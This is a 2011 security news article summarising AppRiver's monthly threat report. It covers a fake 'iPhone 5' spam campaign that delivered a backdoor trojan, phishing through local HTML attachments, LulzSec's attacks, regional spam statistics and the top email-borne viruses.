RSS Alerts

Share

More services

Related Stories

Top 5 Stories

News

Spam campaign hypes the ‘iPhone 5’ but delivers malware

12 July 2011

Last month, spammers sent around an email with an advertisement touting the new “iPhone 5”. Unfortunately, the phone does not exist, but recipients who click on the email get instead a trojan designed to attack host PCs, according to AppRiver’s July Threat and Spamscape Report.

The advertisement has links to a malicious web page that hosts a file named iphone5.gif.exe. The file infects the users' PCs and creates a backdoor to the machine, the report found.

“The spam went out right before Apple’s World Wide Developers Conference, so it could snag a few people”, Fred Touchette, senior security analyst with AppRiver, told Infosecurity. The conference was held June 6-10 in San Francisco.

The report also found an increase in html spam, virus, and phishing attacks using attachments. The attachments are uses to trick recipients into believing they are on a legitimate webpage, in order to veil the hackers true intentions.

“In this method, spammers send an attachment. Once it is opened, some people might be tricked into thinking they are visiting an actual webpage; in actuality, it is local to their machine. Once they fill out the phishing form and hit submit, [the information is sent] off to a website [where the hackers] are storing the information. That way, they can keep that site up and operational longer”, Touchette explained.

Another noteworthy occurrence in June was the rash of attacks by LulzSec against many governmental and corporate targets. “They were attack public facing web servers and databases, and the real damage they did…was releasing users passwords and all this personal information; it was really unnecessary”, Touchette said. “Overall, I think it was a publicity grab”, he added.

In terms of spam origination, Russia held onto the top spot for the third month in a row, according to the monthly spam report. South Korea jumped two spots to take third place, with India in second place.

By region, Asia was the top source of spam, making up 40.3% of spam origination worldwide. Europe was second, with 26.2% of the world total, and North American was third, with 16.2%.

According to the AppRiver report, the top 10 email-delivered viruses were: X.W32.Sasfis.pak, X.UPX.App.pakuber, W32\Mydoom.O, X.W32.Buzus.pak, W32\Mydoom.R_worm, X.W32.Netsky.Q, W32\Merond.O_worm, W32\Mydoom.N, W32\Netsky.C, and X.UPX.App.pakuberb. The virus names that begin with “X.” signify rules that were written by AppRiver analysts.

Spam activity started off slow, but spiked in the second week of June, when the AppRiver filters began to catch millions of pieces per day. “Though it is normal for virus traffic patterns to rise and fall with associated botnet activity, this wave seems to be remaining strong”, the report noted.

In addition, there was an increase in the use of the McDonald’s brand in spam. In June, emails began circulating claiming to be coupons for free food at the fast food chain, but the emails contained malware, not free food coupons, the report noted.

This article is featured in:
Internet and Network Security • Malware and Hardware Security • Wireless and Mobile Security

 

Comment on this article

You must be registered and logged in to leave a comment about this article.

Terms & Conditions |Privacy |Website Design|Reed Exhibitions. All rights reserved. Copyright © 2012